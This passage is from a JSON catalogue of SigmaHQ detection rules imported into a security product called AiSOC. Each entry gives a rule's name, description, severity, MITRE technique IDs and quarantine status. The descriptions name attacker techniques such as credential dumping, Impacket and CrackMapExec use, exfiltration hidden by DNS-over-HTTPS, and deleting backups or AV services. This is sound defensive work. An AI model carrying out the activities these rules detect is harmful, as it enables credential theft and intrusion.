"provenance": { "source": "SigmaHQ/sigma", "source_id": "037dcd71-33a8-4392-bb01-293c94663e5a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gpg4win_decryption.yml" } }, { "id": "sigmahq-sigma-039a7469-0296-4450-84c0-f6966b16dc6d", "type": "detection", "name": "PIM Approvals And Deny Elevation", "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pim-approvals-and-deny-elevation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "039a7469-0296-4450-84c0-f6966b16dc6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_pim_activation_approve_deny.yml" } }, { "id": "sigmahq-sigma-03cc0c25-389f-4bf8-b48d-11878079f1ca", "type": "detection", "name": "Suspicious MSHTA Child Process", "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-mshta-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-03d83090-8cba-44a0-b02f-0b756a050306", "type": "detection", "name": "Potential WinAPI Calls Via PowerShell Scripts", "description": "Detects use of WinAPI functions in PowerShell scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1106" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-winapi-calls-via-powershell-scripts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "03d83090-8cba-44a0-b02f-0b756a050306", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_win_api_susp_access.yml" } }, { "id": "sigmahq-sigma-03f4ca17-de95-428d-a75a-4ee78b047256", "type": "detection", "name": "HackTool - Impacket File Indicators", "description": "Detects file creation events with filename patterns used by Impacket.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-impacket-file-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "03f4ca17-de95-428d-a75a-4ee78b047256", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_impacket_file_indicators.yml" } }, { "id": "sigmahq-sigma-0403d67d-6227-4ea8-8145-4e72db7da120", "type": "detection", "name": "UtilityFunctions.ps1 Proxy Dll", "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/utilityfunctions-ps1-proxy-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0403d67d-6227-4ea8-8145-4e72db7da120", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" } }, { "id": "sigmahq-sigma-043c4b8b-3a54-4780-9682-081cb6b8185c", "type": "detection", "name": "Suspicious IIS Module Registration", "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-iis-module-registration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "043c4b8b-3a54-4780-9682-081cb6b8185c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_susp_module_registration.yml" } }, { "id": "sigmahq-sigma-0442defa-b4a2-41c9-ae2c-ea7042fc4701", "type": "detection", "name": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-attempt-using-new-networkprovider-reg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_new_network_provider.yml" } }, { "id": "sigmahq-sigma-044ba588-dff4-4918-9808-3f95e8160606", "type": "detection", "name": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/copy-dmp-dump-files-from-remote-share-via-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "044ba588-dff4-4918-9808-3f95e8160606", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml" } }, { "id": "sigmahq-sigma-046218bd-e0d8-4113-a3c3-895a12b2b298", "type": "detection", "name": "Session Manager Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001", "T1546.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/session-manager-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "046218bd-e0d8-4113-a3c3-895a12b2b298", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" } }, { "id": "sigmahq-sigma-04936b66-3915-43ad-a8e5-809eadfd1141", "type": "detection", "name": "Insensitive Subfolder Search Via Findstr.EXE", "description": "Detects execution of findstr with the \"s\" and \"i\" flags for a \"subfolder\" and \"insensitive\" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1564.004", "T1552.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/insensitive-subfolder-search-via-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "04936b66-3915-43ad-a8e5-809eadfd1141", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_subfolder_search.yml" } }, { "id": "sigmahq-sigma-04ad83ef-1a37-4c10-b57a-81092164bf33", "type": "detection", "name": "Github Repository/Organization Transferred", "description": "Detects when a repository or an organization is being transferred to another location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020", "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-repository-organization-transferred.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "04ad83ef-1a37-4c10-b57a-81092164bf33", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_repo_or_org_transferred.yml" } }, { "id": "sigmahq-sigma-04b45a8a-d11d-49e4-9acc-4a1b524407a5", "type": "detection", "name": "DNS-over-HTTPS Enabled by Registry", "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-over-https-enabled-by-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" } }, { "id": "sigmahq-sigma-04b60639-39c0-412a-9fbe-e82499c881a3", "type": "detection", "name": "Windows Defender Firewall Has Been Reset To Its Default Configuration", "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-firewall-has-been-reset-to-its-default-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "04b60639-39c0-412a-9fbe-e82499c881a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml" } }, { "id": "sigmahq-sigma-04e2a23a-9b29-4a5c-be3a-3542e3f982ba", "type": "detection", "name": "Google Workspace Granted Domain API Access", "description": "Detects when an API access service account is granted domain authority.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-granted-domain-api-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_granted_domain_api_access.yml" } }, { "id": "sigmahq-sigma-05296024-fe8a-4baf-8f3d-9a5f5624ceb2", "type": "detection", "name": "Malicious Driver Load", "description": "Detects loading of known malicious drivers via their hash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05296024-fe8a-4baf-8f3d-9a5f5624ceb2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_mal_drivers.yml" } }, { "id": "sigmahq-sigma-0531e43a-d77d-47c2-b89f-5fe50321c805", "type": "detection", "name": "RegAsm.EXE Initiating Network Connection To Public IP", "description": "Detects \"RegAsm.exe\" initiating a network connection to public IP adresses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regasm-exe-initiating-network-connection-to-public-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0531e43a-d77d-47c2-b89f-5fe50321c805", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_regasm_network_activity.yml" } }, { "id": "sigmahq-sigma-055fb148-60f8-462d-ad16-26926ce050f1", "type": "detection", "name": "AWS User Login Profile Was Modified", "description": "Detects activity when someone is changing passwords on behalf of other users.\nAn attacker with the \"iam:UpdateLoginProfile\" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-user-login-profile-was-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "055fb148-60f8-462d-ad16-26926ce050f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_update_login_profile.yml" } }, { "id": "sigmahq-sigma-055fb54c-a8f4-4aee-bd44-f74cf30a0d9d", "type": "detection", "name": "HackTool - SharpMove Tool Execution", "description": "Detects the execution of SharpMove, a .NET utility performing multiple tasks such as \"Task Creation\", \"SCM\" query, VBScript execution using WMI via its PE metadata and command line options.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpmove-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "055fb54c-a8f4-4aee-bd44-f74cf30a0d9d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpmove.yml" } }, { "id": "sigmahq-sigma-056c7317-9a09-4bd4-9067-d051312752ea", "type": "detection", "name": "Powershell Executed From Headless ConHost Process", "description": "Detects the use of powershell commands from headless ConHost window.\nThe \"--headless\" flag hides the windows from the user upon execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1059.003", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-executed-from-headless-conhost-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "056c7317-9a09-4bd4-9067-d051312752ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml" } }, { "id": "sigmahq-sigma-058f4380-962d-40a5-afce-50207d36d7e2", "type": "detection", "name": "HackTool - CrackMapExec Execution Patterns", "description": "Detects various execution patterns of the CrackMapExec pentesting framework", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1047", "T1053", "T1059.003", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/hacktool-crackmapexec-execution-patterns.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "058f4380-962d-40a5-afce-50207d36d7e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml" } }, { "id": "sigmahq-sigma-05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "type": "detection", "name": "WMI Persistence - Command Line Event Consumer", "description": "Detects WMI command line event consumers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-persistence-command-line-event-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" } }, { "id": "sigmahq-sigma-059c5af9-5131-4d8d-92b2-de4ad6146712", "type": "detection", "name": "LiveKD Driver Creation By Uncommon Process", "description": "Detects the creation of the LiveKD driver by a process image other than \"livekd.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/livekd-driver-creation-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "059c5af9-5131-4d8d-92b2-de4ad6146712", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml" } }, { "id": "sigmahq-sigma-05a2ab7e-ce11-4b63-86db-ab32e763e11d", "type": "detection", "name": "MMC Spawning Windows Shell", "description": "Detects a Windows command line executable started from MMC", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mmc-spawning-windows-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml" } }, { "id": "sigmahq-sigma-05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "type": "detection", "name": "Service Registry Key Deleted Via Reg.EXE", "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-registry-key-deleted-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" } }, { "id": "sigmahq-sigma-05b3e303-faf0-4f4a-9b30-46cc13e69152", "type": "detection", "name": "Potential Persistence Via PowerShell User Profile Using Add-Content", "description": "Detects calls to \"Add-Content\" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.013" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-powershell-user-profile-using-add-content.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_user_profile_tampering.yml" } }, { "id": "sigmahq-sigma-05c36dd6-79d6-4a9a-97da-3db20298ab2d", "type": "detection", "name": "XSL Script Execution Via WMIC.EXE", "description": "Detects the execution of WMIC with the \"format\" flag to potentially load local XSL files.\nAdversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.\nExtensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1220", "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/xsl-script-execution-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml" } }, { "id": "sigmahq-sigma-05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "type": "detection", "name": "Add New Download Source To Winget", "description": "Detects usage of winget to add new additional download sources", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-new-download-source-to-winget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml" } }, { "id": "sigmahq-sigma-05f3c945-dcc8-4393-9f3d-af65077a8f86", "type": "detection", "name": "Suspicious SYSVOL Domain Group Policy Access", "description": "Detects Access to Domain Group Policies stored in SYSVOL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-sysvol-domain-group-policy-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" } }, { "id": "sigmahq-sigma-060c3ef1-fd0a-4091-bf46-e7d625f60b73", "type": "detection", "name": "Suspicious Get-ADReplAccount", "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-adreplaccount.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" } }, { "id": "sigmahq-sigma-060d5ad4-3153-47bb-8382-43e5e29eda92", "type": "detection", "name": "Unsigned Module Loaded by ClickOnce Application", "description": "Detects unsigned module load by ClickOnce application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-module-loaded-by-clickonce-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "060d5ad4-3153-47bb-8382-43e5e29eda92", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml" } }, { "id": "sigmahq-sigma-06125661-3814-4e03-bfa2-1e4411c60ac3", "type": "detection", "name": "Backup Files Deleted", "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 